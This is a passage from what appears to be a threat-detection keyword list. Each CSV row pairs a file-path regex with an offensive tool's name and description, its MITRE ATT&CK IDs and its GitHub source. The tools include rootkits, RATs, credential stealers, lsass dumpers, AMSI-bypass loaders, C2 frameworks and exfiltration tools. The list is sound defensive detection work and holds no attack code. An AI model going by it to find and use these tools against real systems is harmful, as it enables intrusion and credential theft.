T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\NetExec-main\*",".{0,1000}\\NetExec\-main\\.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\netkit\client\shell.py*",".{0,1000}\\netkit\\client\\shell\.py.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","0","N/A","10","1","17","3","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z" "*\netkit\src\netkit.*",".{0,1000}\\netkit\\src\\netkit\..{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","0","N/A","10","1","17","3","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z" "*\NetLoader.exe*",".{0,1000}\\NetLoader\.exe.{0,1000}","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense 
Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","10","8","759","138","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" "*\NetshHelperBeacon.cpp*",".{0,1000}\\NetshHelperBeacon\.cpp.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","10","2","172","34","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z" "*\NetshHelperBeacon.dll*",".{0,1000}\\NetshHelperBeacon\.dll.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","10","2","172","34","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z" "*\NetshHelperBeacon.lib*",".{0,1000}\\NetshHelperBeacon\.lib.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","10","2","172","34","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z" "*\NetshHelperBeacon.log*",".{0,1000}\\NetshHelperBeacon\.log.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","10","2","172","34","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z" "*\NetshHelperBeacon.pdb*",".{0,1000}\\NetshHelperBeacon\.pdb.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. 
Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","10","2","172","34","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z" "*\NetshHelperBeacon\*",".{0,1000}\\NetshHelperBeacon\\.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","10","2","172","34","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z" "*\netshlep.cpp*",".{0,1000}\\netshlep\.cpp.{0,1000}","offensive_tool_keyword","Offensive-Netsh-Helper","Maintain Windows Persistence with an evil Netshell Helper DLL","T1174 - T1055.011 - T1546.013 - T1574.002 - T1105","TA0003 ","N/A","N/A","Persistence","https://github.com/rtcrowley/Offensive-Netsh-Helper","1","0","N/A","9","1","12","5","2018-07-28T02:12:09Z","2018-07-25T22:49:20Z" "*\netview.x64.dll*",".{0,1000}\\netview\.x64\.dll.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*\NewPhish.ps1*",".{0,1000}\\NewPhish\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*\nGenerated payload:*",".{0,1000}\\nGenerated\spayload\:.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","N/A","3","10","27","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z" "*\Ngrok-Disk.dll*",".{0,1000}\\Ngrok\-Disk\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\Ngrok-Install.dll*",".{0,1000}\\Ngrok\-Install\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\NiceFile.ppam*",".{0,1000}\\NiceFile\.ppam.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\NiceRAT.py*",".{0,1000}\\NiceRAT\.py.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" 
"*\NiceRAT-1.0.0.zip*",".{0,1000}\\NiceRAT\-1\.0\.0\.zip.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*\NiceRAT-main\*",".{0,1000}\\NiceRAT\-main\\.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*\Nidhogg.cpp*",".{0,1000}\\Nidhogg\.cpp.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*\Nidhogg.exe*",".{0,1000}\\Nidhogg\.exe.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red 
teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*\Nidhogg.sln*",".{0,1000}\\Nidhogg\.sln.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*\Nidhogg.sys*",".{0,1000}\\Nidhogg\.sys.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one 
simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*\NidhoggClient.exe*",".{0,1000}\\NidhoggClient\.exe.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" 
"*\NidhoggClient\*",".{0,1000}\\NidhoggClient\\.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*\nightCrawler.ps1*",".{0,1000}\\nightCrawler\.ps1.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","9","1","60","9","2024-04-01T07:49:15Z","2023-12-04T07:05:48Z" "*\nikto.py*",".{0,1000}\\nikto\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\NimBlackout*",".{0,1000}\\NimBlackout.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 
- T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","10","922","102","2024-03-14T16:56:58Z","2020-10-08T11:22:26Z" "*\NimDllSideload\*",".{0,1000}\\NimDllSideload\\.{0,1000}","offensive_tool_keyword","NimDllSideload","DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/byt3bl33d3r/NimDllSideload","1","0","N/A","9","2","157","17","2022-12-04T21:52:49Z","2022-12-03T03:25:57Z" "*\Nimperiments-main*",".{0,1000}\\Nimperiments\-main.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*\NimPlant.*",".{0,1000}\\NimPlant\..{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*\nimproxydll\*",".{0,1000}\\nimproxydll\\.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","0","N/A","9","1","11","0","2024-03-22T10:29:56Z","2024-03-15T15:15:45Z" "*\nimproxydll-main\*",".{0,1000}\\nimproxydll\-main\\.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","0","N/A","9","1","11","0","2024-03-22T10:29:56Z","2024-03-15T15:15:45Z" "*\Ninja.py*",".{0,1000}\\Ninja\.py.{0,1000}","offensive_tool_keyword","Ninja","Open 
source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*\NLBrute*.rar*",".{0,1000}\\NLBrute.{0,1000}\.rar.{0,1000}","offensive_tool_keyword","NLBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/amazond/NLBrute-1.2","1","0","N/A","10","1","0","1","2023-12-21T12:25:54Z","2023-12-21T12:22:27Z" "*\NLBrute*.zip*",".{0,1000}\\NLBrute.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","NLBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/amazond/NLBrute-1.2","1","0","N/A","10","1","0","1","2023-12-21T12:25:54Z","2023-12-21T12:22:27Z" "*\NLBrute.exe*",".{0,1000}\\NLBrute\.exe.{0,1000}","offensive_tool_keyword","NLBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/amazond/NLBrute-1.2","1","0","N/A","10","1","0","1","2023-12-21T12:25:54Z","2023-12-21T12:22:27Z" "*\nmap-ajp.py*",".{0,1000}\\nmap\-ajp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-cassandra.py*",".{0,1000}\\nmap\-cassandra\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" 
"*\nmap-cups.py*",".{0,1000}\\nmap\-cups\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-distccd.py*",".{0,1000}\\nmap\-distccd\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-dns.py*",".{0,1000}\\nmap\-dns\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-finger.py*",".{0,1000}\\nmap\-finger\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-ftp.py*",".{0,1000}\\nmap\-ftp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - 
TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-http.py*",".{0,1000}\\nmap\-http\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-imap.py*",".{0,1000}\\nmap\-imap\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-irc.py*",".{0,1000}\\nmap\-irc\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-kerberos.py*",".{0,1000}\\nmap\-kerberos\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-ldap.py*",".{0,1000}\\nmap\-ldap\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - 
T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-mongodb.py*",".{0,1000}\\nmap\-mongodb\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-mountd.py*",".{0,1000}\\nmap\-mountd\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-msrpc.py*",".{0,1000}\\nmap\-msrpc\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-mssql.py*",".{0,1000}\\nmap\-mssql\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-multicast-dns.py*",".{0,1000}\\nmap\-multicast\-dns\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs 
automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-mysql.py*",".{0,1000}\\nmap\-mysql\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-nfs.py*",".{0,1000}\\nmap\-nfs\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-nntp.py*",".{0,1000}\\nmap\-nntp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-ntp.py*",".{0,1000}\\nmap\-ntp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-oracle.py*",".{0,1000}\\nmap\-oracle\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance 
